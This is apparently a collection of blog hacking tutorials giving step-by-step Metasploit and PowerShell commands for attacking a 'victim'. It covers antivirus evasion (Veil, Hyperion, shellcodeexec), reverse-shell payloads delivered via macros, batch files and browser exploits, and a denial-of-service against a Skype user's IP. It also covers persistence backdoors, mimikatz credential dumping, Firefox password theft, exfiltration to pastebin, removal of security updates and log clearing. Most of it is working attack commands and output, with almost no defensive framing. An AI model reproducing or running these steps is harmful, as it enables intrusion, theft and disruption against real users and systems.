List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-

Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-

Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

If you are using other interface than eth , then you have to change in script avoid.sh . For exmaple ; i am using ppp0 interface ,so open avoid.sh file & replace line 150 which is IP=$(ifconfig "$IPINT" |grep "inet adr:" |cut -d ":" -f 2 |awk '{ print $1 }') with IP=$(ifconfig ppp0 | awk '/inet addr/ {split ($2,A,":"); print A[2]}').

Click here for original author`s blog.

(3)Syringe:-

wget https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar
tar xf syringe\ 0.1.tar
./syringe.sh

As mention previously , change interface type in script if you are not using eth. Replace line 10 which is export interface=eth0 to export interface=ppp0.

 

(4)Shellcodeexec:-

git clone https://github.com/inquisb/shellcodeexec

we are gonna use downloaded shellcodexec in third step on victim machine.

(1)msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

(2)msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.56.1 E

(3)C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

Click here for detail tutorial on  how to use shellcodeexec?

(5)Hypersion:-

Hyperion is a runtime encrypter for 32-bit portable executables.

wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip
unzip Hyperion-1.0.zip
cd Hyperion-1.0
wine /root/.wine/drive_c/MinGW/bin/g++.exe ./Src/Crypter/*.cpp -o crypter.exe

Now generate metasploit payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=443 -f exe >payload.exe
wine crypter.exe payload.exe encrypted_payload.exe

 

(6)Crypter.py:-

Download it from below link .
http://home.base.be/%72%68%69%6e%63%6b%78%74/script.zip
unzip  script.zip
python crypter.py

If you get error while running then change path of structure.c in line 45 & save it , run again.

(7)Brute-force AV Evasion :-

Genpayloads.py is script to generate lots of payloads , then scan folder for specific after that you have some binary left in folder which does not detected by specific AV.

Click here for Original tutorial

wget https://raw.github.com/obscuresec/random/master/GenPayloads.py
python GenPayloads.py windows/meterpreter/reverse_tcp 192.168.1.2 443 1000 yes

(8)Finding Simple AV Signatures with PowerShell :-

Awesome tutorial here to find AV signatures & then change specific bit which trigger AV . It only works with signature-based antivirus .

(9)Powershell:-

Bypass AV using SET powershell module using Batch file

Get shell using powersploit

Deliver powershell payload using macro

(10)Get Shell Using VB script:-

Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well.

For details tutorial click here

(11)Ghost Writing ASM :-

Using Metasm To Avoid Antivirus Detection. First generate metasploit payload in raw format then disassmble using metasm which come with metasploit.Add anything you want so long as you don’t break the functionality of the application.After that compile into EXE.

For tutorial click here .

(12)Different Pivoting technique to bypass AV :-

Following are framework & module which are mostly used after getting credentials. It does not flag by AV like traditional psexec.

(1)Veil-Catapult

(2)SMBExec

(3)Keimpx

(4)PTH suite

(5)Metasploit module:- powershell_psexec , psexec_psh , psexec_command

If you know other methods for AV evasion then please comment here.

Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit

Now we have generated our shellcode. Now we will create macro.

(1)Open any word or Excell document

(2)Click on view & then click on Macros.

(3)Give name to macro & create macro.

(4)Remove all things from modules windows & Paste our generated VB code.

(5)Saved it as type Word Macro-Enabled Document.

Send this file to victim. By default in MS Office  " Disable all macros with notification " option is enabled , so whenever any document try to execute Macro it will pop up security warning that macro is disable ; so to execute our shellcode using macro victim should click on Enable content.

You have to setup listener to listen reverse connection. If your IP is not available when victim open Document then document will be crash.So now we will setup listener

use exploit/multi/handler
set lhost 192.168.56.102
set lport 443
set payload windows/meterpreter/reverse_tcp
set autorunscript migrate -n explorer.exe
exploit

Here we setup migrate script as autorunscript so when document will closed our shell will not die.

Fun with skype resolver

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.

If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you got reply use following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have I.P. of victim.

In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.

Use one of following  links to get I.P. of your victim using his skype user-name.

(1)http://www.skyperesolver.com/

(2)http://www.resolveme.org/ 

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/

Okay we got I.P. Now you can directly DOS or DDOS( ddos and dos attacks are illegal) them . But we are going to use different technique to shutdown your victim pc using RDP.

First scan ip to find open ports of victim.

root@bt:~# nmap 192.168.56.101

Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 995 filtered ports
PORT      STATE  SERVICE
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)

From result we can see that port 3389 is open which is used for RDP.

Now we will use metasploit Auxiliary module to check vulnerability.

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(ms12_020_check) > run

[+] 192.168.56.101:3389 Vulnerable to MS12-020
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Okay we got that host is vulnerable to MS12-020.Now we will use metasploit module to Dos that I.p.

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.56.101:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.56.101:3389 - 210 bytes sent
[*] 192.168.56.101:3389 - Checking RDP status...
[+] 192.168.56.101:3389 seems down
[*] Auxiliary module execution completed

And bingo ; your victim machine should be restarted. :)

Get shell using Missing Autoruns.

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.

(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.

After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.

(1)Get meterpreter shell.

(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.

(3)Now from uploaded directory execute following command to get missing autoruns of machine

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4)Now we have list of file which is missing ; these files are run at startup time.

(5)In my case you can see that uTorrent.exe is missing .

(6)So now i rename my backdoor to uTorrent .exe & uploaded to the path where it`s not found.

Now whenever machine is restarted you get shell.(Don`t forget to running multi/handler!!!)

For just POC ; you can run autorunsc.exe again to find out whether  our backdoor (uTorrent.exe) is written successfully or not?

In above image you can see that  uTorrent.exe is no longer missing which missed in previous step.

(B)Now this is second method; but may be suspicious.

When you put binary in start up folder it will run automatically when pc is started.

Startup Folder Location in windows Xp:-

C:\Documents and Settings\"nirav"\Start Menu\Programs\Startup

Startup Folder location In windows 7:-

C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

So upload your binary to start up folder ;make it hidden using following command.
attrb +h backdoor.exe
Restart machine & Hopefully you will get shell.

Schedule Task in windows after Exploitation.

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.

After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.

First create one batch file , put following code in it

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"

Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.

Get clear text password:-

Following are different methods to get clear text password of windows.

(1)using mimikatz or wce get clear text password of victim.

(2) You can also use mimikatz password dump method .

(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can use wce & mimikatz in memory without uploading binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

So till now i upload one batch file ; backdoor & get clear text password.

Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00

It will ask to enter password which we got before.

You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.

Exploit For All IE version(CVE-2013-3893).

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.

For more technical Detail view metasploit blog here . 

The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,


msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.1:443
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.


Send this link to victim. As soon as he open link you will get meterpreter shell.

Hack local network PC using windows theam file.

This module exploits a vulnerability mainly affecting Microsoft
Windows XP and Windows 2003. The vulnerability exists in the
handling of the Screen Saver path, in the [boot] section. An
arbitrary path can be used as screen saver, including a remote SMB
resource, which allows for remote code execution when a malicious
.theme file is opened, and the "Screen Saver" tab is viewed. The
code execution is also triggered if the victim installs the
malicious theme and stays away from the computer, when Windows tries
to display the screensaver.

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP3 / Windows 2003 SP2


msf > use exploit/windows/fileformat/ms13_071_theme
msf exploit(ms13_071_theme) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_071_theme) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_071_theme) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_071_theme) > [*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.56.1\qggdxi\vleGT.scr
[*] Server started.

Then send your generated theam file to victim using \\192.168.56.1\qggdxi\vleGT.scr link ;he should open it through using smb. So tell him to put this link to run .

As soon as he open file you will get session.

Extract & decrypt passwords from Firefox & Thunderbird.

Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.

Most of the morden browser save information in sqlite format. When user enter login information ; firefox asked user to remember password.If user click on remember password then this passwords are saved into firefox database in signons.sqlite. But passwords are encrypted. so just by downloading signons.sqlite we can not extract passwords from it. Signons.sqlite is useless without the key3.db file, which also resides in the profile folder of your application. Passwords in the signons.sqlite file is encrypted with TripleDES in CBC mode. The key used for the encryption is saved in key3.db and encrypted as well.

Firefox Database path in windows:-

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Mozilla\Firefox\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Mozilla\Firefox\<random_name>.default

Firefox Database path in linux
/root/.Mozilla/Firefox/Profile/<random_name>.default

First we have to get meterpreter shell using any known vulnerability or using any metasploit method.

Then we have to download three files from remote PC which are key3.db,signons.sqlite;cert8.db.You can use metasploit post module (use post/multi/gather/firefox_creds)for downloading this file or you can also download manually by browsing directory.

Now we have database file as well as encryption key in key3.db. So now we have to decrypt it. I can not find any third party software to decrypt this passwords for linux platform.But i found one software which is working very well in windows.Download software from here . (It will work for both Firefox & thunderbird)

(1)copy key3.db,signons.sqlite;cert8.db files in some folder which can be browse from windows.

(2)Open windows.
(3)Install that software.
(4)Open it and Just specify firefox installed path & specify folder in which we copied downloaded file.

(5)click on Start recovery button.

 

Fireox & thunderbird use same encryption technique. So you can also get thunderbird password from above mention method. Just download key3.db,signons.sqlite;cert8.db files from thunderbird folder whose path are as follow

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Thunderbird\Profiles\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Thunderbird\Profiles\<random_name>.default

What is solution?

If you set master password for firefox & thunderbird then without master password ; saved passwords can not be decrypted.

Exploit for IE 9 on Windows 7 SP1

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version  9.0.8112.16446

Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)

msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer

msf exploit(ms13_059_cflatmarkuppointer) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set uripath /
uripath => /
msf exploit(ms13_059_cflatmarkuppointer) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_059_cflatmarkuppointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_059_cflatmarkuppointer) > [*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Now send that link to victim; as soon as he open link; you will get meterpreter shell.

Exploit Oracle Endeca Server with metasploit.

This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).

First run ./msfupdate or git pull to update metasploit.

Now when you open metasploit & found error like this
[-]     /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .

Open oracle_endeca_exec.rb file in any editor.
Add this line require 'msf/core/exploit/powershell' after require 'msf/core'.
So it look like
require 'msf/core'
require 'msf/core/exploit/powershell'
Save it & open metasploit again.

Exploit target:

   Id  Name
   --  ----
   0   Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits

msf > use exploit/windows/http/oracle_endeca_exec
msf exploit(oracle_endeca_exec) > set rhost 192.168.56.101(victim`s i.p.)
rhost => 192.168.56.101
msf exploit(oracle_endeca_exec) > run

Post exploitation & swaparoo backdoor.

Today we are going to create valid RDP user in victim pc using two method.

(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )

Now we use meterpreter script which create RDP useraccount for logon.
run getgui -u username -p password.

Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.

rdesktop victim i.p.

When you complete your session type following command for cleanup process; so after you logoff created useraccount will be deleted.

run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc

(2)Now we use another method; it`s backdoor.But it`s physical backdoor; so you have to present at victim pc to get access.But backdoor is created remotely.

Download swaparoo script from here .

Put it into the /opt/msf/scripts/meterpreter folder

After that get meterpreter shell using any method.

Now type run swaparoo -h

Now type  run swaparoo

As you can see in image last line is  "[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!"

So when you restart victim pc & login screen appear ; just press shift key 5 times (From victim `s keyboard)you get cmd with system privilege.Now from cmd you can do anything like remove user,add user, change password.

If you want to remove this backdoor then type following command

run swaparoo -r 

What`s limitation?

Anyone who is physically  present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.

Post exploitation using Nishang.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more information you can visit his blog.

Today we will see some basic module from nishang framework for post exploitation.

This tutorial is about post exploitation so first get meterpreter shell using any metasploit method. If you are new than visit metasploit section of blog.

(1)Download nishang from here .

(2)Unzip it & put it in root directory.

meterpreter>shell
cd C:\\Users/victim
mkdir 123
exit

meterpreter>upload /root/nishang/ C:\\Users/victim/123

We upload all powershell script from our nishang folder to victim pc `s folder.

After upload we have to get shell.

meterpreter>shell
cd c://Windows\System32\WindowsPowerShell\v1.0


So now everything is set ; we execute our powershell script from our shell.

(1)First we use Information Gather module. It gather all informataion from victim pc & it has exifil option so gatherd information is directly uploaded to the pastebin;gmail.

So type following in our shell

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Information_Gather.ps1 -exfil AIP_Of_Pastebin username password 1

After execution complete information is uploaded to the your pastebin account.

This information is encoded in base64; so to get plain text decode it using base64 decoder.

(2)Another module is credential pop up. So it pop up credential menu in victim screen ; if victim enter right password then it will stop ;otherwise it will pop up again.

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Credentials.ps1 -exfil AIP_Of_Pastebin username password 1

(3)Other good module is removing update from victim`s p.c.

To all updates from the target.
powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 All

TO remove all security updates from the target.
powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 Security

To remove specific update from target.
powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Remove-Update.ps1 KB2761226

(4)Speaks:-This powershell script speak text in victim`s pc which we write in our shell.

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Speak.ps1 'Hello sir; you have been hacked'

These are  basic module ; there are also advanced module in nishnag.If you need more information than visit this link.

After using powershell script remove folder & clear event.
cd C:\\Users/victim
RD /s /q 123
exit
clearev

Bypass AV using powershell method using batch file.

In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and python. Today we use powershell module.

If you don`t aware about powershell ; then you can google it.It`s windows based scripting language like bash in linux.Most of AV cannot detect it.We use SET powershell module to bypass AV; you can also use veil module.

cd  /pentest/exploits/set/
./setoolkit

type 1 which is social engineering attack
After that type 10.

Then give your i.p. & port to connect reverse shell.

Now in figure you can see that it has been generated & stored in to /root/.set/reports/powershell . And we also start metasploit listener.If victim paste our generated payload in cmd then we can get meterpreter shell. But i think it`s hard to tell someone to copy something & paste into cmd. So we will create batch file of our payload.

Create Batch file of our Payload.

(1)open x86_powershell_injection.txt file from  /root/.set/reports/powershell.
(2)Add path of powershell in first line. For example your code is starting from powershell word just put C:\\windows/system32/windowspowershell/v1.0/ before it.
(3)If you want to hide text during execution put @echo off at start of script.
(4)copy all code from x86_powershell_injection.txt
(5)Create new file & paste code
(6)Save this file as .bat extension and send to victim

As soon as he open file we can get shell.

Exploit for Firefox 17 in Windows XP sp3

Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it.


Exploit target:

   Id  Name
   --  ----
   0   Firefox 17 & Firefox 21 / Windows XP SP3


msf > use exploit/windows/browser/mozilla_firefox_onreadystatechange

msf exploit(mozilla_firefox_onreadystatechange) > set LHOST 180.215.222.190
LHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set SRVHOST 180.215.222.190
SRVHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set uripath /
uripath => /
msf exploit(mozilla_firefox_onreadystatechange) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_firefox_onreadystatechange) > run
[*] Exploit running as background job.

[*] Started reverse handler on 180.215.222.190:4444
[*] Using URL: http://180.215.222.190:8080/
[*] Server started.
msf exploit(mozilla_firefox_onreadystatechange) >

Bypass AV using Veil In Backtrack.

Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder to encode our payload ;So it can not be detected by AV. Today we show how we can bypass AV using Veil. Veil is python based tool which create FUD payload.

How to Download & use ?

wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
chmod +x setup.sh
./setup.sh

It will download all required python package for generating payload.

Veil is officially supported in Kali linux ; But it`s python based tool so we can use it in any os which is able to execute python script. I used it in Backtrack 5.We have to make some change in generated veil.py file to get working in backtrack.
Open directory of veil & go to config and open veil.py.(In latest version of veil , open /etc/veil/settings.py) If you installed metasploit from binary package then Change  line of metasploit path to /opt/metasploit/apps/pro/msf3/ and save it.

Go to veil direcory & run
./Veil.py

   

Now type list & you can see available payload.

Select payload.

type generate.

After that payload has been generated & you have to start metasploit listner for that payload type following in terminal.

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=444 E

Now send file to victim. As soon as he open file you get admin access without triggering AV alert.Look at my AV update status.

 As you can see in bottom of panel that AV is activate & it`s updated  ; still we can bypass AV & get meterpreter seesion.

 [!] And don't submit samples to any online scanner! ;)
It`s author request.